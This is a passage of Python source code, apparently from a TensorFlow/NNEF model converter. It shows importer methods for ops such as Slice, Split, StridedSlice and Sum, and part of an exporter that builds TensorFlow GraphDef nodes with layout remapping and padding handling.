assert output_size[i]%input_shape[i+1] == 0, "Unable to convert, ResizeNearestNeighbor uses non-integer factors"
factor.append(int(output_size[i]/input_shape[i+1]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.NearestUpsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
else:
for i in range(len(input_shape[1:-1])):
assert input_shape[i+1]%output_size[i] == 0, "Unable to convert, ResizeNearestNeighbor uses non-integer factors"
factor.append(int(input_shape[i+1]/output_size[i]))
output_shape.append(int(output_size[i]))
output_shape.append(input_shape[-1])
nnef_node = node.NearestDownsample(input=nnef_node_input,
factor=factor,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format='NHWC')
return nnef_node, tf_inputs, attrs
def import_Round(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Round(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Rsqrt(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Rsqrt(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Select(self, tfnode):
tf_inputs = {'condition':0, 'true_value':1, 'false_value':2}
attrs = {}
nnef_node_condition = self.get_node_from_pool(tfnode, tf_inputs['condition'])
nnef_node_true_value = self.get_node_from_pool(tfnode, tf_inputs['true_value'])
nnef_node_false_value = self.get_node_from_pool(tfnode, tf_inputs['false_value'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_true_value, nnef_node_false_value)
nnef_node = node.Select(condition=nnef_node_condition,
true_value=nnef_node_true_value,
false_value=nnef_node_false_value,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Shape(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.ShapeOf(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Sigmoid(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sigmoid(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Sign(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sign(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Slice(self, tfnode):
tf_inputs = {'input': 0, 'begin':1, 'end':2}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_begin = self.get_node_from_pool(tfnode, tf_inputs['begin'])
nnef_node_end = self.get_node_from_pool(tfnode, tf_inputs['end'])
if nnef_node_begin.op == 'variable':
begin = nnef_node_begin.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_begin.op == 'constant':
begin = np.reshape(np.asarray(nnef_node_begin.parameters['value'], dtype=np.int32), nnef_node_begin.parameters['shape'])
else:
begin = nnef_node_begin.get_value()
if nnef_node_end.op == 'variable':
end = nnef_node_end.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_end.op == 'constant':
end = np.reshape(np.asarray(nnef_node_end.parameters['value'], dtype=np.int32), nnef_node_end.parameters['shape'])
else:
end = nnef_node_end.get_value()
axes = list(range(len(begin)))
output_shape = len(axes)*[0]
for i in range(len(axes)):
output_shape[i] = int(end[i]-begin[i])
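# E.g. (hypothetical) begin [0, 0], end [1, 512] -> axes [0, 1] and
# output_shape [1, 512].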
nnef_node = node.Slice(input=nnef_node_input,
axes=axes,
begin=list(begin),
end=list(end),
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Softmax(self, tfnode):
tf_inputs = {'x': 0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Softmax(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,)
return nnef_node, tf_inputs, attrs
def import_Softplus(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Softplus(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Softsign(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Softsign(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Split(self, tfnode):
tf_inputs = {'value':1, 'axis': 0}
attrs = {'num_split': None}
nnef_node_value = self.get_node_from_pool(tfnode, tf_inputs['value'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
self.remove_node_from_pool(nnef_node_axis)
split_axis = int(nnef_node_axis.parameters['value'][0])
num_split = tfnode.attr['num_split'].i
names = []
if num_split >= 1:
new_name = '['
for i in range(num_split):
if i == 0:
new_name = new_name + self.gen_node_name(tfnode.name) + ', '
names.append(self.gen_node_name(tfnode.name))
else:
new_name = new_name + self.gen_node_name(tfnode.name + ':' + str(i)) + ', '
names.append(self.gen_node_name(tfnode.name + ':' + str(i)))
new_name = new_name[:-2] + ']'
input_shape = nnef_node_value.output_shape[:]
ratio = math.floor(input_shape[split_axis]/num_split)
modu = input_shape[split_axis]%num_split
ratios = []
for i in range(len(names)):
rat_val = ratio
if modu != 0:
rat_val += 1
modu -= 1
ratios.append(int(rat_val))
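# E.g. (hypothetical) splitting a dimension of size 7 into num_split == 3
# parts: ratio = 2, modu = 1, so ratios == [3, 2, 2].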
nnef_node_split = node.Split(value=nnef_node_value,
axis=split_axis,
ratios=ratios,
_uid=new_name,
_output_shape=input_shape)
for i in range(len(names)):
out_shape = input_shape[:]
out_shape[split_axis] = ratios[i]
nnef_node = node.OutputVal(base_node=nnef_node_split,
base_index=i,
_uid=names[i],
_output_shape=out_shape)
self.node_pool[nnef_node.name] = nnef_node
return nnef_node_split, tf_inputs, attrs
def import_Sqrt(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sqrt(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Square(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Sqr(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Squeeze(self, tfnode):
tf_inputs = {'input': 0}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
input_shape = nnef_node_input.output_shape
output_shape = []
if tfnode.attr['squeeze_dims'].list.i:
for i in range(len(input_shape)):
if i not in tfnode.attr['squeeze_dims'].list.i:
output_shape.append(input_shape[i])
else:
for i in input_shape:
if i != 1:
output_shape.append(i)
output_shape = [int(v) for v in output_shape]
nnef_node = node.Reshape(input=nnef_node_input,
shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_maintain_format=False)
return nnef_node, tf_inputs, attrs
def import_StridedSlice(self, tfnode):
tf_inputs = {'input': 0, 'begin':1, 'end':2, 'strides':3}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_begin = self.get_node_from_pool(tfnode, tf_inputs['begin'])
nnef_node_end = self.get_node_from_pool(tfnode, tf_inputs['end'])
nnef_node_strides = self.get_node_from_pool(tfnode, tf_inputs['strides'])
if nnef_node_begin.op == 'variable':
begin = nnef_node_begin.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_begin.op == 'constant':
begin = np.reshape(np.asarray(nnef_node_begin.parameters['value'], dtype=np.int32), nnef_node_begin.parameters['shape'])
else:
begin = nnef_node_begin.get_value()
if nnef_node_end.op == 'variable':
end = nnef_node_end.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_end.op == 'constant':
end = np.reshape(np.asarray(nnef_node_end.parameters['value'], dtype=np.int32), nnef_node_end.parameters['shape'])
else:
end = nnef_node_end.get_value()
if nnef_node_strides.op == 'variable':
strides = nnef_node_strides.get_tensordatafile().get_data().get_array()[0][0]
elif nnef_node_strides.op == 'constant':
strides = np.reshape(np.asarray(nnef_node_strides.parameters['value'], dtype=np.int32), nnef_node_strides.parameters['shape'])
else:
strides = nnef_node_strides.get_value()
for stride in strides:
assert stride == 1, "Slice operation uses a stride that is not one, currently unsupported."
axes = list(range(len(begin)))
output_shape = len(axes)*[0]
for i in range(len(axes)):
if begin[i] == -1 and end[i] == 0:
output_shape[i] = 0
elif end[i] == 0:
output_shape[i] = int(nnef_node_input.output_shape[i] - begin[i])
else:
output_shape[i] = int(end[i]-begin[i])
if 0 in output_shape:
nnef_node_slice = node.Slice(input=nnef_node_input,
axes=axes,
begin=list(begin),
end=list(end),
_uid=self.gen_node_name(tfnode.name) + '_slice',
_output_shape=output_shape)
self.node_pool[nnef_node_slice.name] = nnef_node_slice
squeeze_shape = [value for value in output_shape if value != 0]
nnef_node = node.Reshape(input=nnef_node_slice,
shape=squeeze_shape,
_uid=self.gen_node_name(tfnode.name),
_output_shape=squeeze_shape,
_maintain_format=False)
else:
nnef_node = node.Slice(input=nnef_node_input,
axes=axes,
begin=list(begin),
end=list(end),
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Sub(self, tfnode):
tf_inputs = {'x':0, 'y':1}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
nnef_node_y = self.get_node_from_pool(tfnode, tf_inputs['y'])
output_shape = self.define_elementwise_binary_output_shape(nnef_node_x, nnef_node_y)
nnef_node = node.Sub(x=nnef_node_x,
y=nnef_node_y,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape,
_data_format=tfnode.attr['data_format'])
return nnef_node, tf_inputs, attrs
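# import_Sum deduplicates and sorts the reduction axes.  With keep_dims the
# reduced axes stay as size-1 dimensions (sum_reduce followed by a
# format-preserving reshape); without it they are dropped, falling back to
# shape [1] when every axis is reduced.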
def import_Sum(self, tfnode):
tf_inputs = {'input':0, 'axis':1}
attrs = {'keep_dims': None}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axis = self.get_node_from_pool(tfnode, tf_inputs['axis'])
input_shape = nnef_node_input.output_shape[:]
if nnef_node_axis.op == 'variable':
shape = nnef_node_axis.get_tensordatafile().get_data().get_array()[0][0]
else:
shape = [int(nnef_node_axis.parameters['value'][0])]
axes = []
for i in shape:
if i not in axes:
axes.append(i)
axes.sort()
self.remove_node_from_pool(nnef_node_axis)
output_shape = input_shape[:]
if(tfnode.attr['keep_dims'].b or tfnode.attr['keepdims'].b):
for i in axes:
output_shape[i] = 1
nnef_node_sum = node.SumReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name) + '_sum',)
self.node_pool[nnef_node_sum.name] = nnef_node_sum
nnef_node = node.Reshape(input=nnef_node_sum,
shape=output_shape,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name),
_maintain_format=True)
else:
axes.sort(reverse=True)
for i in axes:
output_shape.pop(i)
if output_shape == []:
output_shape = [1]
axes.sort()
nnef_node = node.SumReduce(input=nnef_node_input,
axes=axes,
_output_shape=output_shape,
_uid=self.gen_node_name(tfnode.name))
return nnef_node, tf_inputs, attrs
def import_Tanh(self, tfnode):
tf_inputs = {'x':0}
attrs = {}
nnef_node_x = self.get_node_from_pool(tfnode, tf_inputs['x'])
output_shape = nnef_node_x.output_shape[:]
nnef_node = node.Tanh(x=nnef_node_x,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
def import_Transpose(self, tfnode):
tf_inputs = {'input':0, 'axes': 1}
attrs = {}
nnef_node_input = self.get_node_from_pool(tfnode, tf_inputs['input'])
nnef_node_axes = self.get_node_from_pool(tfnode, tf_inputs['axes'])
axes = list(nnef_node_axes.get_tensordatafile().get_data().get_array()[0][0])
self.remove_node_from_pool(nnef_node_axes)
output_shape = []
for i in range(len(nnef_node_input.output_shape)):
output_shape.append(nnef_node_input.output_shape[axes[i]])
nnef_node = node.Transpose(input=nnef_node_input,
axes=axes,
_uid=self.gen_node_name(tfnode.name),
_output_shape=output_shape)
return nnef_node, tf_inputs, attrs
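# TensorflowExporter walks the NNEF graph (via networkx) and serializes a
# TensorFlow GraphDef.  NNEF tensors are laid out NCHW while the exported
# graph is NHWC, so 4-D axes are remapped with self.mapping = {0:0, 1:3,
# 2:1, 3:2} (e.g. the NNEF channel axis 1 becomes NHWC axis 3).
# Minimal usage sketch (the output path is illustrative only):
#   exporter = TensorflowExporter('models/out.pb')
#   exporter.run(nnef_graph)  # nnef_graph must expose get_nx_graph()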
class TensorflowExporter(TensorflowLogger, ImporterExporter):
def __init__(self, output_model):
super(TensorflowExporter, self).__init__()
self.output_model = output_model
self.mapping = {0:0, 1:3, 2:1, 3:2}
def run(self, nnef_graph):
self.nxgraph = nnef_graph.get_nx_graph()
self.generate_tf_graph()
def format_name(self, name):
# NNEF node names encode TensorFlow name scopes with underscores; restore
# every underscore to '/' to recover the scoped TF name.
return name.replace('_', '/')
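# add_input wires one NNEF parameter into a TF node's input list.  Python
# scalars become fresh Const nodes; 'variable' inputs additionally have their
# stored tensor reshaped/transposed according to 'order' (e.g. [0, 2, 3, 1]
# for NCHW->NHWC activations, [2, 3, 1, 0] for OIHW->HWIO conv filters);
# 'output_val' inputs are rewritten to TF's "name:index" convention.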
def add_input(self, tfnode, nnef_node, param_name, order=[]):
index = 0
if isinstance(nnef_node.parameters[param_name], list):
nnef_node_param = nnef_node.parameters[param_name][index]
else:
nnef_node_param = nnef_node.parameters[param_name]
while nnef_node_param is not None:
if not isinstance(nnef_node_param, Node):
nodeConst = NodeDef(name=self.format_name(nnef_node.name) + '/' + param_name, op='Const')
nodeConst.attr['dtype'].type = 1
nodeConst.attr['value'].tensor.dtype = 1
nodeConst.attr['value'].tensor.float_val.extend([nnef_node_param])
self.tf_graph.node.extend([nodeConst])
tfnode.input.extend([nodeConst.name])
elif nnef_node_param.op == 'variable':
tfnode.input.extend([self.format_name(nnef_node_param.name)])
for n in self.tf_graph.node:
if (n.name) == tfnode.input[-1]:
if n.attr['value'].tensor.tensor_shape.dim:
return
shapes = nnef_node_param.parameters['shape']
if not order:
for i in range(0, len(shapes)):
n.attr['value'].tensor.tensor_shape.dim.add().size = shapes[i]
np_array_read = np.asarray(nnef_node_param.get_tensordatafile().get_data().get_array()[0], dtype=np.float32)
n.attr['value'].tensor.tensor_content = np_array_read.tobytes()
else:
new_shape = []
for i in range(len(order)):
new_shape.append(shapes[order[i]])
n.attr['value'].tensor.tensor_shape.dim.add().size = new_shape[i]
np_array_read = np.asarray(nnef_node_param.get_tensordatafile().get_data().get_array()[0], dtype=np.float32)
np_array_read = np.reshape(np_array_read, shapes)
if len(new_shape) < len(shapes):
np_array_read = np.reshape(np_array_read, new_shape)
else:
np_array_read = np.transpose(np_array_read, order)
n.attr['value'].tensor.tensor_content = np.reshape(np_array_read, new_shape).tobytes()
break
elif nnef_node_param.op == 'reshape':
tfnode.input.extend([self.format_name(nnef_node_param.name)])
if order != []:
for n in self.tf_graph.node:
if n.name == tfnode.input[-1]:
for n_shape in self.tf_graph.node:
if n_shape.name == n.input[1]:
reshape_list = list(np.frombuffer(n_shape.attr['value'].tensor.tensor_content, dtype=np.int32))
new_reshape = []
for i in order:
new_reshape.append(reshape_list[i])
n_shape.attr['value'].tensor.tensor_content = np.asarray(new_reshape, dtype=np.int32).tobytes()
elif nnef_node_param.op == 'output_val':
base_name = nnef_node_param.parameters['base_node'].name[:nnef_node_param.parameters['base_node'].name.find(',')]
if base_name[0] == '[':
base_name = base_name[1:]
if nnef_node_param.parameters['base_index'] == 0:
tfnode.input.extend([self.format_name(base_name)])
else:
name = self.format_name(base_name) + ':' + str(nnef_node_param.parameters['base_index'])
tfnode.input.extend([name])
else:
tfnode.input.extend([self.format_name(nnef_node_param.name)])
if isinstance(nnef_node.parameters[param_name], list):
index += 1
if index >= len(nnef_node.parameters[param_name]):
nnef_node_param = None
else:
nnef_node_param = nnef_node.parameters[param_name][index]
else:
nnef_node_param = None
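# generate_tf_graph dispatches each NNEF node to an export_<op> method (or
# export_UNKNOWN when none exists) and finally serializes the GraphDef to
# self.output_model, creating the output directory if needed.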
def generate_tf_graph(self):
self.tf_graph = graph_pb2.GraphDef()
for nnef_node, data in self.nxgraph.nodes(data=True):
if 'node' in data:
nnef_node = data['node']
if nnef_node.name:
if hasattr(self, "export_" + nnef_node.op):
func = getattr(self, "export_" + nnef_node.op)
func(nnef_node)
else:
self.export_UNKNOWN(nnef_node)
else:
print('WARNING: graph node has no NNEF node data attached: ', nnef_node)
network_dir, model_filename = os.path.split(self.output_model)
if not os.path.exists(network_dir):
os.makedirs(network_dir)
with open(self.output_model, "wb") as f:
f.write(self.tf_graph.SerializeToString())
def export_UNKNOWN(self, nnef_node):
print(nnef_node.op + " is currently not supported!\n")
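# Pause so the unsupported-op warning is not lost before export continues.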
input()
def export_abs(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Abs')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_add(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Add')
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_and(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='LogicalAnd')
#Going to be issues with type
self.add_input(tfnode, nnef_node, 'x')
self.add_input(tfnode, nnef_node, 'y')
self.tf_graph.node.extend([tfnode])
def export_area_downsample(self, nnef_node):
tfnode_shape = NodeDef(name=self.format_name(nnef_node.name) + '/size', op='Const')
tfnode_shape.attr['dtype'].type = 3
tfnode_shape.attr['value'].tensor.dtype = 3
output_size = np.asarray(nnef_node.output_shape[2:], dtype=np.int32)
tfnode_shape.attr['value'].tensor.tensor_shape.dim.add().size = len(output_size)
tfnode_shape.attr['value'].tensor.tensor_content = output_size.tobytes()
self.tf_graph.node.extend([tfnode_shape])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ResizeArea')
self.add_input(tfnode, nnef_node, 'input')
tfnode.input.extend([tfnode_shape.name])
tfnode.attr['T'].type = 1
tfnode.attr['align_corners'].b = False
self.tf_graph.node.extend([tfnode])
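# export_avg_pool converts kernel sizes and strides from NCHW order to NHWC.
# Explicit NNEF padding that is neither SAME ([]) nor VALID (all zeros) is
# emulated by inserting a standalone Pad node in front of the pool and then
# marking the pool itself VALID; e.g. padding [(0,0),(0,0),(1,1),(2,2)]
# becomes TF paddings [[0,0],[1,1],[2,2],[0,0]].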
def export_avg_pool(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='AvgPool')
self.add_input(tfnode, nnef_node, 'input')
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = b'NHWC'
sizes = nnef_node.parameters['size']
nhwc_sizes = [sizes[0]]
for i in range(2, len(sizes)):
nhwc_sizes.append(sizes[i])
nhwc_sizes.append(sizes[1])
tfnode.attr['ksize'].list.i.extend(nhwc_sizes)
dilations = nnef_node.parameters['dilation']
if dilations != [] and dilations != [1]*4:
raise ValueError("TensorFlow does not support dilated pooling")
strides = nnef_node.parameters['stride']
if strides == []:
nhwc_strides = [1]*4
else:
nhwc_strides = [strides[0]]
for i in range(2, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(strides[1])
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif(nnef_node.parameters['padding'] == [(0, 0), (0, 0), (0, 0), (0, 0)]):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[pads[0][0], pads[0][1]]]
for i in range(2, len(pads)):
padding = padding + [[pads[i][0], pads[i][1]]]
padding = padding + [[pads[1][0], pads[1][1]]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
self.tf_graph.node.extend([tfnode])
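# export_batch_normalization emits a single FusedBatchNorm in inference mode
# (is_training=False); the per-channel scale/offset/mean/variance variables
# are flattened to rank 1 via the [1] reorder passed to add_input.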
def export_batch_normalization(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='FusedBatchNorm')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
self.add_input(tfnode, nnef_node, 'scale', [1])
self.add_input(tfnode, nnef_node, 'offset', [1])
self.add_input(tfnode, nnef_node, 'mean', [1])
self.add_input(tfnode, nnef_node, 'variance', [1])
tfnode.attr['T'].type = 1
tfnode.attr['data_format'].s = b'NHWC'
tfnode.attr['epsilon'].f = nnef_node.parameters['epsilon']
tfnode.attr['is_training'].b = False
self.tf_graph.node.extend([tfnode])
def export_ceil(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Ceil')
self.add_input(tfnode, nnef_node, 'x')
tfnode.attr['T'].type = 1
self.tf_graph.node.extend([tfnode])
def export_concat(self, nnef_node):
tfnode_axis = NodeDef(name=self.format_name(nnef_node.name) + "/axis", op="Const")
tfnode_axis.attr['dtype'].type = 3
tfnode_axis.attr['value'].tensor.dtype = 3
tfnode_axis.attr['value'].tensor.tensor_shape.dim.extend([])
if len(nnef_node.output_shape) == 4:
tfnode_axis.attr['value'].tensor.int_val.extend([self.mapping[nnef_node.parameters['axis']]])
else:
tfnode_axis.attr['value'].tensor.int_val.extend([nnef_node.parameters['axis']])
self.tf_graph.node.extend([tfnode_axis])
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='ConcatV2')
self.add_input(tfnode, nnef_node, 'values')
tfnode.input.append(self.format_name(nnef_node.name) + '/axis')
tfnode.attr['N'].i = len(nnef_node.parameters['values'])
tfnode.attr['T'].type = 1
tfnode.attr['Tidx'].type = 3
self.tf_graph.node.extend([tfnode])
def export_constant(self, nnef_node):
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Const')
tfnode.attr['dtype'].type = 1
tfnode.attr['value'].tensor.dtype = 1
tfnode.attr['value'].tensor.float_val.extend([nnef_node.parameters['value'][0]])
if len(nnef_node.parameters['shape']) == 2 and nnef_node.parameters['shape'][0] == 1:
nnef_node.parameters['shape'].pop(0)
for i in range(len(nnef_node.parameters['shape'])):
tfnode.attr['value'].tensor.tensor_shape.dim.add().size = nnef_node.parameters['shape'][i]
self.tf_graph.node.extend([tfnode])
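# export_conv handles 2-D (Conv2D) and 3-D (Conv3D) convolutions.  Grouped
# convolutions are only supported in the depthwise case (groups == input
# channels), which is routed to export_planewise_conv.  Filters are permuted
# from NNEF's OIHW layout to TF's HWIO, and a non-zero bias becomes a
# trailing Add node ("<name>/conv" feeding "<name>").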
def export_conv(self, nnef_node):
conv_len = len(nnef_node.parameters['input'].output_shape)
if(conv_len == 4) and nnef_node.parameters['groups'] == nnef_node.parameters['input'].output_shape[1]:
return self.export_planewise_conv(nnef_node)
assert nnef_node.parameters['groups'] == 1, "TensorFlow does not support grouped convolutions currently."
if conv_len == 4:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv2D')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 1, 0])
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
tfnode.attr['use_cudnn_on_gpu'].b = True
elif conv_len == 5:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv3D')
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 4, 1])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 4, 1, 0])
tfnode.attr['data_format'].s = 'NDHWC'.encode('utf-8')
else:
raise ValueError("Cannot handle input_size " + str(conv_len) + " yet.")
tfnode.attr['T'].type = 1
if 'dilation' in nnef_node.parameters:
dilations = nnef_node.parameters['dilation']
if dilations:
nhwc_dilations = [1]
for i in range(0, len(dilations)):
nhwc_dilations.append(dilations[i])
nhwc_dilations.append(1)
else:
nhwc_dilations = [1]*conv_len
else:
nhwc_dilations = [1]*conv_len
tfnode.attr['dilations'].list.i.extend(nhwc_dilations)
strides = nnef_node.parameters['stride']
if strides:
nhwc_strides = [1]
for i in range(0, len(strides)):
nhwc_strides.append(strides[i])
nhwc_strides.append(1)
else:
nhwc_strides = [1]*conv_len
tfnode.attr['strides'].list.i.extend(nhwc_strides)
if nnef_node.parameters['padding'] == []:
tfnode.attr['padding'].s = 'SAME'.encode('utf-8')
elif nnef_node.parameters['padding'] == [(0, 0)]*(conv_len-2):
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
else:
pads = nnef_node.parameters['padding']
padding = [[0, 0]]
for pad in pads:
padding = padding + [[pad[0], pad[1]]]
padding = padding + [[0, 0]]
padding = np.asarray(padding, dtype=np.int32)
tfnode_pad_const = NodeDef(name=self.format_name(nnef_node.name) + "/Pad/paddings", op='Const')
tfnode_pad_const.attr['dtype'].type = 3
tfnode_pad_const.attr['value'].tensor.dtype = 3
for size in np.shape(padding):
tfnode_pad_const.attr['value'].tensor.tensor_shape.dim.add().size = size
tfnode_pad_const.attr['value'].tensor.tensor_content = padding.tobytes()
self.tf_graph.node.extend([tfnode_pad_const])
tfnode_pad = NodeDef(name=self.format_name(nnef_node.name) + "/Pad", op='Pad')
tfnode_pad.input.extend([tfnode.input[0]])
tfnode_pad.input.extend([tfnode_pad_const.name])
tfnode_pad.attr['T'].type = 1
tfnode_pad.attr['Tpaddings'].type = 3
self.tf_graph.node.extend([tfnode_pad])
tfnode.input[0] = tfnode_pad.name
tfnode.attr['padding'].s = 'VALID'.encode('utf-8')
if('bias' in nnef_node.parameters and nnef_node.parameters['bias'] != 0):
tfnode.name = tfnode.name + '/conv'
self.tf_graph.node.extend([tfnode])
tfnode_add = NodeDef(name=self.format_name(nnef_node.name), op='Add')
tfnode_add.input.extend([tfnode.name])
self.add_input(tfnode_add, nnef_node, 'bias')
tfnode_add.attr['T'].type = 1
self.tf_graph.node.extend([tfnode_add])
else:
self.tf_graph.node.extend([tfnode])
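# export_deconv maps NNEF deconv to Conv2DBackpropInput (2-D) or
# Conv3DBackpropInputV2 (3-D), whose first input is a Const holding the NHWC
# output shape derived from the node's NCHW output_shape.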
def export_deconv(self, nnef_node):
assert nnef_node.parameters['groups'] == 1, "TensorFlow does not support grouped convolutions currently."
conv_len = len(nnef_node.output_shape)
tfnode_const = NodeDef(name=self.format_name(nnef_node.name) + '/output_shape', op='Const')
tfnode_const.attr['dtype'].type = 3
tfnode_const.attr['value'].tensor.dtype = 3
tfnode_const.attr['value'].tensor.tensor_shape.dim.add().size = conv_len
new_out_shape = [nnef_node.output_shape[0]]
for i in range(2, conv_len):
new_out_shape.append(nnef_node.output_shape[i])
new_out_shape.append(nnef_node.output_shape[1])
tfnode_const.attr['value'].tensor.tensor_content = np.asarray(new_out_shape, dtype=np.int32).tobytes()
self.tf_graph.node.extend([tfnode_const])
if conv_len == 4:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv2DBackpropInput')
tfnode.input.extend([tfnode_const.name])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 1, 0])
self.add_input(tfnode, nnef_node, 'input', [0, 2, 3, 1])
tfnode.attr['data_format'].s = 'NHWC'.encode('utf-8')
elif conv_len == 5:
tfnode = NodeDef(name=self.format_name(nnef_node.name), op='Conv3DBackpropInputV2')
tfnode.input.extend([tfnode_const.name])
self.add_input(tfnode, nnef_node, 'filter', [2, 3, 4, 1, 0])
